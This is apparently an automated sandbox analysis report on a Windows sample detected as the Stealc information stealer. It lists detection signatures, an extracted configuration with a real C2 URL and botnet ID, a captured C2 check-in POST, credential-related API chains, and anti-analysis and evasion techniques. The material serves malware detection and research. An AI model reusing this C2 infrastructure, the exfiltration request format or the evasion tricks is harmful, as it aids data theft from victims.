
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1522422
MD5: e3989af8cb5908ba300311259af23245
SHA1: 0013081341d0faf8d7b9a9a20d75310d8b9c13fa
SHA256: 665f8ded044e58e1900e7441cc75ebbc9438f9a6a0fde9528698dab670966203
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6704 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E3989AF8CB5908BA300311259AF23245)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.1737937946.00000000054D0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6704 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6704 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.1000000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-30T02:01:09.384981+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.1000000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/e2b1563c6670f193.php# | Virustotal: Detection: 18%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01009B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01007240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01009AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01018EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01014910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01014570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01013EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECGDHIDAAFHIIDGDBFIE
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 45 34 30 45 46 44 43 45 44 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 2d 2d 0d 0a
Data Ascii:
------ECGDHIDAAFHIIDGDBFIE
Content-Disposition: form-data; name="hwid"

5E40EFDCED231817704571
------ECGDHIDAAFHIIDGDBFIE
Content-Disposition: form-data; name="build"

doma
------ECGDHIDAAFHIIDGDBFIE--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01004880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1779494572.00000000018DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/$(
Source: file.exe, 00000000.00000002.1779494572.00000000018DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/:(
Source: file.exe, 00000000.00000002.1779494572.00000000018DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1779494572.00000000018F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php#
Source: file.exe, 00000000.00000002.1779494572.000000000187E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37m

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0168804E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01688013
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013CF0BF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013D4092
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013D0BD4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013D25B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013CD589
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C4DF2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013AFDC1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013C8495
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0133FCC7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_014547F8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01330EAC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0138D6FB
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 010045C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: exwozbij ZLIB complexity 0.9950333610938953
Source: file.exe, 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1737937946.00000000054D0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01013720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Q2Y1P5WU.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1808384 > 1048576
Source: file.exe | Static PE information: Raw size of exwozbij is bigger than: 0x100000 < 0x193600

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.1000000.0.unpack :EW;.rsrc :W;.idata :W; :EW;exwozbij:EW;werwxfcu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;exwozbij:EW;werwxfcu:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1bac57 should be: 0x1c30f2
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: exwozbij
Source: file.exe | Static PE information: section name: werwxfcu
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01482152 push 671187EAh; mov dword ptr [esp], ebp | 0_2_014820C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01482152 push 5D451B19h; mov dword ptr [esp], ebp | 0_2_014821FF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01446169 push esi; mov dword ptr [esp], 16DF2999h | 0_2_0144618E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01446169 push 614DB154h; mov dword ptr [esp], esi | 0_2_014461C3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01446169 push eax; mov dword ptr [esp], 3BF7ED87h | 0_2_014461DB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01446169 push 619522CAh; mov dword ptr [esp], eax | 0_2_01446213
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0132011D push 450CD900h; mov dword ptr [esp], edi | 0_2_01320171
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0132011D push 614FA981h; mov dword ptr [esp], ecx | 0_2_013201A1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0143C17A push esi; mov dword ptr [esp], 7D3DE62Ch | 0_2_0143C19B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0130D1BD push 0D1E0E46h; mov dword ptr [esp], ebp | 0_2_0130D1E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0130D1BD push edi; mov dword ptr [esp], edx | 0_2_0130D20C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0130D1BD push edi; mov dword ptr [esp], esi | 0_2_0130D260
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0130D1BD push ebp; mov dword ptr [esp], esi | 0_2_0130D26F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0130D1BD push esi; mov dword ptr [esp], eax | 0_2_0130D2C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0130D1BD push ebx; mov dword ptr [esp], 32E4D61Dh | 0_2_0130D304
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0130D1BD push 643A3B7Ch; mov dword ptr [esp], ebp | 0_2_0130D31B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013F41A5 push 2C7294B4h; mov dword ptr [esp], esp | 0_2_013F41C8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013F399B push 22EFC150h; mov dword ptr [esp], ebp | 0_2_013F39B2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_013F399B push ebx; mov dword ptr [esp], ecx | 0_2_013F39E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0126498C push 0CE04504h; mov dword ptr [esp], esp | 0_2_012683E1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0126498C push esi; mov dword ptr [esp], 00000004h | 0_2_012683F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012DC99E push edx; mov dword ptr [esp], 37AB64A1h | 0_2_012DC9DC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012DC99E push edi; mov dword ptr [esp], ecx | 0_2_012DC9E7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012DC99E push 5933C81Ch; mov dword ptr [esp], esp | 0_2_012DCA73
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012DC99E push 6E45E1A2h; mov dword ptr [esp], eax | 0_2_012DCABD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_012DC99E push 1764F851h; mov dword ptr [esp], ecx | 0_2_012DCACD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_016881AB push 025C4831h; mov dword ptr [esp], esp | 0_2_016881C7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_016881AB push ebx; mov dword ptr [esp], 41261073h | 0_2_0168820A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_016881AB push 41BD7126h; mov dword ptr [esp], eax | 0_2_016882B1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_016881AB push ecx; mov dword ptr [esp], eax | 0_2_016882C4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0130E9E7 push 11A54283h; mov dword ptr [esp], edi | 0_2_0130EA05
Source: file.exe | Static PE information: section name: exwozbij entropy: 7.953490732533179

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13290
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1262143 second address: 1262147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1262147 second address: 1262151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F9844BC1D56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1261A6E second address: 1261A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F98450EE8C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D8C0E second address: 13D8C34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9844BC1D5Ch 0x00000008 jmp 00007F9844BC1D65h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D8C34 second address: 13D8C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007F98450EE8DCh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D3BCB second address: 13D3BD1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D3BD1 second address: 13D3BD6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D3BD6 second address: 13D3BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jng 00007F9844BC1D5Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D822B second address: 13D8231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D8231 second address: 13D8235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D8235 second address: 13D8246 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F98450EE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D8246 second address: 13D824A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D824A second address: 13D824E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13D84D4 second address: 13D84E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DC0EE second address: 13DC0F8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F98450EE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DC0F8 second address: 13DC13F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jng 00007F9844BC1D72h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F9844BC1D68h 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 push ecx 0x00000021 pushad 0x00000022 popad 0x00000023 pop ecx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DC13F second address: 13DC16E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jmp 00007F98450EE8CAh 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DC1C6 second address: 13DC1EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9844BC1D67h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DC2DB second address: 13DC2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DC2E0 second address: 13DC2E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DC2E6 second address: 13DC2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DC344 second address: 13DC348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13DC348 second address: 13DC404 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b movzx edx, cx 0x0000000e push 00000000h 0x00000010 mov si, bx 0x00000013 push F9C9FBC5h 0x00000018 push eax 0x00000019 pushad 0x0000001a push edi 0x0000001b pop edi 0x0000001c jno 00007F98450EE8C6h 0x00000022 popad 0x00000023 pop eax 0x00000024 add dword ptr [esp], 063604BBh 0x0000002b jmp 00007F98450EE8D5h 0x00000030 add edx, 59DEBF5Eh 0x00000036 push 00000003h 0x00000038 jmp 00007F98450EE8D1h 0x0000003d push 00000000h 0x0000003f push 00000003h 0x00000041 call 00007F98450EE8CEh 0x00000046 cld 0x00000047 pop esi 0x00000048 push C9F19B0Ch 0x0000004d jmp 00007F98450EE8CAh 0x00000052 xor dword ptr [esp], 09F19B0Ch 0x00000059 push edi 0x0000005a mov dword ptr [ebp+122D39B3h], eax 0x00000060 pop edi 0x00000061 mov dl, 7Dh 0x00000063 lea ebx, dword ptr 